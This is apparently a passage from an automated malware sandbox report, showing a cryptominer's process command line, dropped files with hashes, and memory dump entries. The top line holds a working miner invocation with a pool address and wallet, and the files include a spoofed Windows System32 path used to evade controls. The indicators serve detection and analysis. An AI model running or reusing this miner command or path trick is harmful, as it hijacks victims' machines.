C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG_CPU -p x --cpu-max-threads-hint=504⤵
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5fa4ccbdfcb11c24ee92cce60311b2ed0
SHA1e39c80b60e4b10037e510e833c94a2c219f7b0fd
SHA256c523d18014d2d23f267641c13645aac36ed557f7773667ac44f061145e9f4f27
SHA51222174e30ae9a56abcb797025cde96b70b311e7b9a90f5004de2d4be998c6c12977e551c58d8702bff3190a80f6aef9f92e847a9f8efac18b7a2ce4bd8e7f6cf0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a0cb52ecad11458881d7edfc499c4053
SHA1eda74aa1fa1b46fdbf5befc3d9843e98eb06b02b
SHA256c96df62683d2b79ca4b1a97bcc247de6822a7bd8eb3f7de533caf198509a6f5b
SHA5128a9c2126701b9324e5bb770b13673ba412445dc095a2c016234198d95111c28b96d2bef0172b43c34215824922d4ed5aa8707f8dc6f0535c1be5b0f506063467
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD597748f71ed95026706014e8524266292
SHA1f60663ea2e2a778c57d07d9678fe04c79c3ff942
SHA256f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f
SHA512b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD590b2459a6432f59ed2d225f7e4b77d96
SHA1e9d41ca7105a28e987fadfd188438e08f1bde664
SHA2563f9daee99f25633b64f3484dce77abf499c125d4072047368e933bf50d0b016b
SHA51241f256166d406f2299f9cf8daf4ab08b0cda00782b15ad951c1f123a315147b9cb7c27ea963f4619ac891a6b77a99c4f5a4a4f5dd8c852f059ddd4013f6b59b6
-
C:\Users\Admin\AppData\Local\Temp\MLANG.dllFilesize
122KB
MD50b62c554572e9d2dfc51b6367c34700f
SHA11a41693552101c650aeeffe9dc9f1c7f7553dd7b
SHA256b05a80ef8ad197ee36620655100e1fd4111ec946a9f012970da4c61d8da43ded
SHA512765e2f686a74804063b1face147a2dfd4cac85fb8273b5b0ccbd7606e46fce9865d5bbeeca40af31a8b584dc0bba1ebc0ff3fa8c1993da08a4b09cd15a394ce9
-
C:\Users\Admin\AppData\Local\Temp\VCRedist.batFilesize
413KB
MD51dfa0a2035388952e2b5c841dfc5f595
SHA1636cc89f8d661960324de4047f4281a6eb8ca37b
SHA256db117c7378bc5ac4c6acc296d07ce799d1bb4a12fac593c16c34e7ccc9d4fa6c
SHA5126b1e7579c432743e4b7927835f02401341ce9fbc26f8f7edecbe95a1bb00c139ae392543d5603fe042c0b76beb1269a6168f1bb72ab6407ca1c505677059a320
-
C:\Users\Admin\AppData\Local\Temp\VCRedists.batFilesize
972KB
MD5c86637644022012aaa6bbfbf8947f3a6
SHA194adf42f7d2a48be6ee33900596f918fc4d6c36d
SHA2561253081538d614b09657b82e17be73f15a63bef1ac1c5d5383624954e0776f41
SHA512df80a94d7fcc1276b60849320ca530b6a5e11f4bfe7aaf816975d6aa0412c046c44df22e2d8914bd26076e698c70ce81adf1cb5c535ba76620b216c1955173e8
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ixp3rjd.wdw.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows \System32\ComputerDefaults.exeFilesize
80KB
MD5d25a9e160e3b74ef2242023726f15416
SHA127a9bb9d7628d442f9b5cf47711c906e3315755b
SHA2567b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
SHA512bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910
-
memory/1980-140-0x000001B454820000-0x000001B454876000-memory.dmpFilesize
344KB
-
memory/1980-26-0x000001B4541A0000-0x000001B454216000-memory.dmpFilesize
472KB
-
memory/1980-34-0x000001B4544E0000-0x000001B454598000-memory.dmpFilesize
736KB
-
memory/1980-32-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmpFilesize
2.0MB
-
memory/1980-31-0x000001B451B20000-0x000001B451B30000-memory.dmpFilesize
64KB
-
memory/1980-141-0x000001B454880000-0x000001B4548CC000-memory.dmpFilesize
304KB
-
memory/1980-139-0x000001B4546E0000-0x000001B4547E4000-memory.dmpFilesize
1.0MB
-
memory/1980-138-0x000001B454640000-0x000001B4546E2000-memory.dmpFilesize
648KB
-
memory/1980-33-0x00007FFF06EC0000-0x00007FFF06F7E000-memory.dmpFilesize
760KB
-
memory/3248-25-0x000001BFCCF10000-0x000001BFCCF54000-memory.dmpFilesize
272KB
-
memory/3248-29-0x00007FFF06EC0000-0x00007FFF06F7E000-memory.dmpFilesize
760KB
-
memory/3248-27-0x000001BFCCA20000-0x000001BFCCA30000-memory.dmpFilesize
64KB
-
memory/3248-28-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmpFilesize
2.0MB
-
memory/3248-30-0x000001BFCCEC0000-0x000001BFCCF0E000-memory.dmpFilesize
312KB
-
memory/3248-6-0x000001BFCC9F0000-0x000001BFCCA12000-memory.dmpFilesize
136KB
-
memory/3248-56-0x000001BFCD410000-0x000001BFCD428000-memory.dmpFilesize
96KB
-
memory/3264-83-0x00007FFF06EC0000-0x00007FFF06F7E000-memory.dmpFilesize
760KB
-
memory/3264-82-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmpFilesize
2.0MB
-
memory/4108-144-0x0000026C7FE70000-0x0000026C7FE90000-memory.dmpFilesize
128KB
-
memory/4108-142-0x0000000140000000-0x00000001407CF000-memory.dmpFilesize
7.8MB
-
memory/4108-143-0x0000000140000000-0x00000001407CF000-memory.dmpFilesize
7.8MB
-
memory/4108-148-0x0000000140000000-0x00000001407CF000-memory.dmpFilesize
7.8MB
-
memory/4108-149-0x0000000140000000-0x00000001407CF000-memory.dmpFilesize
7.8MB
-
memory/4108-147-0x0000000140000000-0x00000001407CF000-memory.dmpFilesize
7.8MB
-
memory/4108-145-0x0000000140000000-0x00000001407CF000-memory.dmpFilesize
7.8MB
-
memory/4108-146-0x0000000140000000-0x00000001407CF000-memory.dmpFilesize
7.8MB
-
memory/4108-150-0x0000000140000000-0x00000001407CF000-memory.dmpFilesize
7.8MB
-
memory/4108-151-0x0000000140000000-0x00000001407CF000-memory.dmpFilesize
7.8MB